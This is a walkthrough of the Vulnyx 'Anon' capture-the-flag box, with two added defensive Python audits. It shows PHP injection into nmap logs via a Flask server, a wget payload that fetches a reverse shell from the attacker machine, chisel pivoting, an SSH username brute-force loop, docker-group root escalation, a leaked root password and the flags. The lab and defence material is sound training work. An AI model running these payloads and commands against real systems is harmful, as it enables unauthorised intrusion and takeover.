Vulnyx-Anon-Walkthrough
城南花已开 Lv6

Information Gathering

Service Enumeration

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.177 08:00:27:a0:2c:8b (Unknown)
192.168.60.254 00:50:56:e4:ae:23 (Unknown)

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.979 seconds (129.36 hosts/sec). 4 responded
export ip=192.168.60.177
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.177:22
Open 192.168.60.177:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-07 21:28 CST
Initiating ARP Ping Scan at 21:28
Scanning 192.168.60.177 [1 port]
Completed ARP Ping Scan at 21:28, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:28
Completed Parallel DNS resolution of 1 host. at 21:28, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:28
Scanning 192.168.60.177 [2 ports]
Discovered open port 22/tcp on 192.168.60.177
Discovered open port 80/tcp on 192.168.60.177
Completed SYN Stealth Scan at 21:28, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.177
Host is up, received arp-response (0.00043s latency).
Scanned at 2025-02-07 21:28:42 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 63
MAC Address: 08:00:27:A0:2C:8B (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Take a look at port 80: it is the Apache default page.

❯ whatweb -v $ip
WhatWeb report for http://192.168.60.177
Status : 200 OK
Title : Apache2 Debian Default Page: It works
IP : 192.168.60.177
Country : RESERVED, ZZ

Summary : Apache[2.4.62], HTTPServer[Debian Linux][Apache/2.4.62 (Debian)]

Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.

Version : 2.4.62 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/

[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.

OS : Debian Linux
String : Apache/2.4.62 (Debian) (from server string)

HTTP Headers:
HTTP/1.1 200 OK
Date: Fri, 07 Feb 2025 13:28:54 GMT
Server: Apache/2.4.62 (Debian)
Last-Modified: Tue, 04 Feb 2025 10:56:19 GMT
ETag: "29cd-62d4edbdf5ee5-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3041
Connection: close
Content-Type: text/html

Nmap Entry Point

Run a directory scan and one directory turns up. Because "Anonymous-Connections" starts with a capital letter, I did not use the lowercase wordlist; otherwise it would not have been found.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.177
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
/Anonymous-Connections (Status: 301) [Size: 332] [--> http://192.168.60.177/Anonymous-Connections/]

It turns out to be a web app with nmap built in?

Try scanning localhost: port 22 is not open, so I guess the web app is running inside Docker.

Also, after the scan finishes, the result is saved to 127.0.0.1.log.


Try scanning further.

Found the directory where the logs are saved: /victims

❯ gobuster dir -u http://$ip/Anonymous-Connections -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.177/Anonymous-Connections
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/victims (Status: 301) [Size: 340] [--> http://192.168.60.177/Anonymous-Connections/victims/]

Confirmed that the output is indeed saved to a file with the .log suffix.

❯ curl http://192.168.60.177/Anonymous-Connections/victims/127.0.0.1.log
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-07 13:38 UTC
Nmap scan report for 127.0.0.1
Host is up (0.00027s latency).
Not shown: 499 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.91 seconds

But how do we use this to get a shell?

Normally a .log file is not parsed as PHP, and we cannot change the file extension either.

My guess is that an .htaccess file is configured so that .log files are parsed as PHP as well.

So let's try injecting PHP code.

The idea here was provided by flower.

Use Python's Flask to craft a response.

```python
from flask import Flask, make_response

app = Flask(__name__)


@app.route('/')
def index():
    # Put the PHP payload in both the body and the Server header,
    # so it lands in whatever nmap copies into its log
    response = make_response("<?php phpinfo();?>")
    response.headers['Server'] = '<?php phpinfo();?>'
    return response


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=83)
```

I started Flask on Kali listening on port 83, then used the target's web scanner to scan Kali.

The PHP was written into the log file as expected.


Try accessing the log.

It really does get parsed.

A quick look shows the address is 172.17.0.2, so it really is running inside Docker.



There is another approach here: use robots.txt. Write PHP code into it, and nmap automatically writes the robots.txt contents into the log.

```
User-agent: *

Allow: /<?php phpinfo();?>
```
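Both injection paths above (the crafted Server header and the robots.txt entry) work for the same reason: the wrapper saves raw nmap output into a web-served directory that Apache has been configured to execute as PHP. The following Python is an added example, not part of the original post or of the box's web app, showing how such a wrapper should treat scanner output on the defender's side: it detects PHP open tags in existing log files, HTML-escapes the output before storing it (which also stops injected HTML from rendering if the log is ever displayed), and derives the file name only from a validated target string so the target cannot steer the write elsewhere. All function names and the sample nmap output are constructed for this illustration.

```python
"""Defensive handling of scanner output that ends up in a web-served directory.

Added example (not from the Anon box or its web app). It assumes a wrapper
that runs nmap and saves the result as <target>.log; the function names
here (find_php_tags, neutralize, safe_log_name, store_scan_result) are hypothetical.
"""
import html
import re
from pathlib import Path
from typing import List, Tuple

# PHP open tags in the forms the interpreter honours: "<?php", "<?=" and the
# short tag "<?" followed by whitespace. Case-insensitive, like PHP itself.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=|\s)", re.IGNORECASE)

# Only IPv4 literals or plain DNS names are accepted as a file name stem, so a
# "target" such as "../../../etc/cron.d/x" cannot redirect the write.
SAFE_TARGET = re.compile(
    r"^(?:\d{1,3}(?:\.\d{1,3}){3}|[A-Za-z0-9](?:[A-Za-z0-9.-]{0,253}[A-Za-z0-9])?)$"
)


def find_php_tags(text: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, line) for every line carrying a PHP open tag.

    Intended as a detection pass over existing *.log files in a victims/ tree.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if PHP_OPEN_TAG.search(line):
            hits.append((lineno, line))
    return hits


def neutralize(text: str) -> str:
    """HTML-escape scanner output before it is stored or rendered.

    Escaping '<' to '&lt;' breaks every PHP open tag (the handler only
    recognises a literal "<?") and also prevents injected HTML/JS from
    rendering if the log is later shown in a browser.
    """
    return html.escape(text, quote=False)


def safe_log_name(target: str) -> str:
    """Build the log file name from the scanned target, rejecting anything that is not a host."""
    if not SAFE_TARGET.match(target):
        raise ValueError(f"refusing to build a file name from target {target!r}")
    return f"{target}.log"


def store_scan_result(raw_output: str, target: str, outdir: Path) -> Path:
    """Write escaped scanner output under outdir (which should live outside the web root)."""
    outdir.mkdir(parents=True, exist_ok=True)
    path = outdir / safe_log_name(target)
    path.write_text(neutralize(raw_output), encoding="utf-8")
    return path


# Constructed sample, shaped like the nmap -sV output the box's wrapper saves;
# the Server header and robots.txt entry carry the same payload the post used.
SAMPLE_OUTPUT = """Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-07 13:38 UTC
Nmap scan report for 192.168.60.100
Host is up (0.00027s latency).
PORT   STATE SERVICE VERSION
83/tcp open  http    Werkzeug httpd
|_http-server-header: <?php phpinfo();?>
| http-robots.txt: 1 disallowed entry
|_/<?php phpinfo();?>
Nmap done: 1 IP address (1 host up) scanned in 16.91 seconds
"""

if __name__ == "__main__":
    import tempfile

    for lineno, line in find_php_tags(SAMPLE_OUTPUT):
        print(f"PHP open tag on line {lineno}: {line}")
    with tempfile.TemporaryDirectory() as tmp:
        written = store_scan_result(SAMPLE_OUTPUT, "192.168.60.100", Path(tmp))
        print(written.read_text(encoding="utf-8").splitlines()[5])
```

Escaping is done at write time rather than at display time on purpose: the PHP handler reads the file straight from disk, so any transformation applied only when the log is rendered would leave the stored bytes executable. Keeping the output directory outside the document root removes the execution path entirely, and the escaping remains as defence in depth should someone later expose that directory.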

That makes things easy. Check whether any functions are disabled, then try to get a reverse shell.

I tried a one-line webshell but got no output.

So instead I had to wget rev.php and then execute it.

After the nmap scan finishes, open the log to see whether it executed.

## change this line in the Flask app above
response = make_response("<?php system('wget 192.168.60.100/rev.php');?>")
--------------------- separator ------------------
192.168.60.177 - - [07/Feb/2025:22:37:04 +0800] "GET /rev.php HTTP/1.1" 200 9288 "-" "Wget/1.21.3"

User Privilege Escalation

Listen on the port and we get a shell inside Docker.

❯ pwncat-cs -lp 4444
[22:37:28] Welcome to pwncat 🐈! __main__.py:164
[22:37:30] received connection from 192.168.60.177:52176 bind.py:84
[22:37:30] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[22:37:31] 192.168.60.177:52176: registered new host w/ db manager.py:957
(local) pwncat$

(remote) hacktivist@debian1:/var/www/html/Anonymous-Connections/victims$ id
uid=1000(hacktivist) gid=1000(hacktivist) groups=1000(hacktivist),27(sudo)
(remote) hacktivist@debian1:/var/www/html/Anonymous-Connections/victims$ sudo -l
Matching Defaults entries for hacktivist on debian1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User hacktivist may run the following commands on debian1:
(ALL : ALL) NOPASSWD: ALL

You can see the hostname is debian1, so there must also be a debian2.

In root's home directory, the history gives a hint.

Checking the IPs, there is one on the 10.x subnet, so I guess debian2 is on that subnet.

(remote) hacktivist@debian1:/home/hacktivist$ sudo su
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.17.0.2. Set the 'ServerName' directive globally to suppress this message
httpd (pid 8) already running
root@debian1:/home/hacktivist# cd ~
root@debian1:~# ls -al
total 28
drwx------ 1 root root 4096 Feb 4 23:15 .
drwxr-xr-x 1 root root 4096 Feb 4 10:48 ..
-rw------- 1 root root 137 Feb 7 14:44 .bash_history
-rw-r--r-- 1 root root 605 Feb 4 11:03 .bashrc
drwxr-xr-x 3 root root 4096 Feb 4 14:49 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
root@debian1:~# cat .bash_history
echo 'root:$uP3r_$3cUr3_D0ck3r' | chpasswd
cd
nano .bash_history
exit
id
cd ~
ls
ls -al
cd /home/
ls
cd hacktivist/
ls
ls -al
exit
exit
root@debian1:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
5: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
valid_lft forever preferred_lft forever
9: eth1@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:0a:0a:0a:0a brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 10.10.10.10/24 brd 10.10.10.255 scope global eth1
valid_lft forever preferred_lft forever

Internal Network Enumeration

Use the nmap on the target itself to scan the 10.x subnet.

Host .20 has port 2222 open.

(remote) hacktivist@debian1:/tmp$ nmap 10.10.10.10/24
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-07 15:02 UTC
Nmap scan report for 10.10.10.1
Host is up (0.00022s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap scan report for debian1 (10.10.10.10)
Host is up (0.00024s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http

Nmap scan report for debian2.private (10.10.10.20)
Host is up (0.00026s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
2222/tcp open EtherNetIP-1

Nmap done: 256 IP addresses (3 hosts up) scanned in 3.51 seconds

Upload chisel and set up port forwarding.

(local) pwncat$ upload chisel
./chisel ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 9.4/9.4 MB • 1.1 MB/s • 0:00:00
[22:48:52] uploaded 9.37MiB in 9.94 seconds upload.py:76
(local) pwncat$

(remote) hacktivist@debian1:/tmp$ ls
chisel
(remote) hacktivist@debian1:/tmp$ chmod +x chisel
(remote) hacktivist@debian1:/tmp$ ./chisel client 192.168.60.100:2333 R:2222:10.10.10.20:2222

Kali listens on port 2333, and you will see a local port 2222 mapping appear.

❯ ./chisel server --reverse -p 2333
2025/02/07 22:51:16 server: Reverse tunnelling enabled
2025/02/07 22:51:16 server: Fingerprint CqFV5hn41DlTjjQ6h1BkwH/yLg0/Pu3yFXjRf0x1zKU=
2025/02/07 22:51:16 server: Listening on http://0.0.0.0:2333
2025/02/07 23:05:02 server: session#3: tun: proxy#R:2222=>10.10.10.20:2222: Listening
----------------------------- separator -----------------
❯ ssh [email protected] -p 2222
[email protected]'s password:
Linux debian2 6.1.0-30-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.124-1 (2025-01-12) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Feb 4 23:12:09 2025 from 10.10.10.1
root@debian2:~#


Port forwarding is not strictly necessary here: the Docker container has no ssh client, but one can simply be installed.

On debian2, looking at the history shows there is a private key file in .ssh.

Most likely that is the private key for logging into 10.10.10.1, i.e. the host machine.

But we do not know which username the private key belongs to, and it most likely is not root.

So brute-force the username.

Download the private key to the local machine.

```bash
export ip=192.168.60.177
chmod 600 id_rsa
for i in $(cat names.txt); do ssh $i@$ip -i id_rsa; done
```

After typing yes, keep pressing Enter.

Root Privilege Escalation

Finally got the alfredo user.

alfredo@anon:~$ id
uid=1000(alfredo) gid=1000(alfredo) grupos=1000(alfredo),109(docker)
alfredo@anon:~$ cat user.txt
af13f20ce2fb4266b4d381cf8f60f85f

The user is in the docker group.

Docker privilege escalation, and we're done.

alfredo@anon:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
1f3e46996e29: Pull complete
Digest: sha256:56fa17d2a7e7f168a043a2712e63aed1f8543aeafdcee47c58dcffe38ed51099
Status: Downloaded newer image for alpine:latest
# cat /root/root.txt
f3a421bdd1e5119f49c3fda29838cf79
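Both escalations in this box come from configuration rather than a software bug: hacktivist has `(ALL : ALL) NOPASSWD: ALL` inside the container, and alfredo is in the docker group on the host, which is root-equivalent because the group can mount `/` into a container as shown above. The following Python audit is added here and is not part of the original post; it parses `/etc/group`-style text and `sudo -l` output to flag both conditions. The sample inputs are constructed to mirror this box, and the function names are hypothetical.

```python
"""Audit of root-equivalent group membership and unrestricted sudo rules.

Added example, not part of the original post. The sample inputs below are
constructed to mirror what the post observed (hacktivist with NOPASSWD: ALL
on debian1, alfredo in the docker group on anon). Function names are hypothetical.
"""
import re
from typing import Dict, List

# Groups whose members can reach root without any exploit: docker and lxd
# (mount the host filesystem into a container), sudo/wheel, disk (raw block devices).
ROOT_EQUIVALENT_GROUPS = {"docker", "lxd", "sudo", "wheel", "disk"}

# A sudoers rule as printed by `sudo -l`: "(runas) TAG: TAG: command".
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_group_file(text: str) -> Dict[str, List[str]]:
    """Map group name -> member list from /etc/group text (name:x:gid:member,member)."""
    groups: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue  # malformed line, skip rather than guess
        groups[parts[0]] = [m for m in parts[3].split(",") if m]
    return groups


def risky_memberships(group_text: str) -> Dict[str, List[str]]:
    """Return only the root-equivalent groups that actually have members."""
    return {
        name: members
        for name, members in parse_group_file(group_text).items()
        if name in ROOT_EQUIVALENT_GROUPS and members
    }


def unrestricted_sudo_rules(sudo_l_output: str) -> List[str]:
    """Pick out `sudo -l` rules that allow ALL commands without a password."""
    hits = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line)
        if m and "NOPASSWD" in m.group("tags") and m.group("cmd").strip() == "ALL":
            hits.append(line.strip())
    return hits


# Constructed sample inputs mirroring the two hosts in the post.
SAMPLE_GROUP = """root:x:0:
sudo:x:27:hacktivist
disk:x:6:
www-data:x:33:
docker:x:109:alfredo
alfredo:x:1000:
"""

SAMPLE_SUDO_L = """Matching Defaults entries for hacktivist on debian1:
    env_reset, mail_badpass, use_pty

User hacktivist may run the following commands on debian1:
    (ALL : ALL) NOPASSWD: ALL
    (root) /usr/bin/less /var/log/syslog
"""

if __name__ == "__main__":
    for group, members in risky_memberships(SAMPLE_GROUP).items():
        print(f"root-equivalent group {group}: {', '.join(members)}")
    for rule in unrestricted_sudo_rules(SAMPLE_SUDO_L):
        print(f"unrestricted sudo rule: {rule}")
```

On a real host, feed `open("/etc/group").read()` and the captured output of `sudo -l` for each account into these functions; the docker group in particular deserves the same review as sudo membership, since the access it grants is equivalent to root.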
